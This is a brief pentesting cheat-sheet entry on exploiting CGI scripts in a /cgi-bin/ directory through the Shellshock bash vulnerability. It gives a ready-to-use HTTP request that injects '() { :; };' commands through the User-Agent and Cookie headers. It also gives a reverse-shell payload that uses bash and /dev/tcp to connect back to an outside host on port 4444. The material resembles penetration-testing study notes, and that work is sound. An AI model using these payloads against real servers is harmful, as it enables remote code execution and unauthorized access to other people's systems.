CGI Pentesting
CGI (Common Gateway Interface) is a standard protocol that enables web servers to interact with external programs, typically to generate dynamic web content or handle web form submissions. If there is /cgi-bin/ directory in the website, we may be able to execute arbitrary OS command.
Enumeration CGI Scripts
Shellshock
Shellshock is the vulnerability of bash v1.0.3-4.3 that allows users to execute arbitrary commands.
If we found the CGI script under /cgi-bin/
, modifying HTTP header to remote code execution.
GET /cgi-bin/example.cgi HTTP/1.1
User-Agent: () { :; }; /bin/bash -c "sleep 5"
Cookie: () { :; }; /bin/bash -c "sleep 5"
# Reverse Shell
User-Agent: () { :; }; /bin/bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"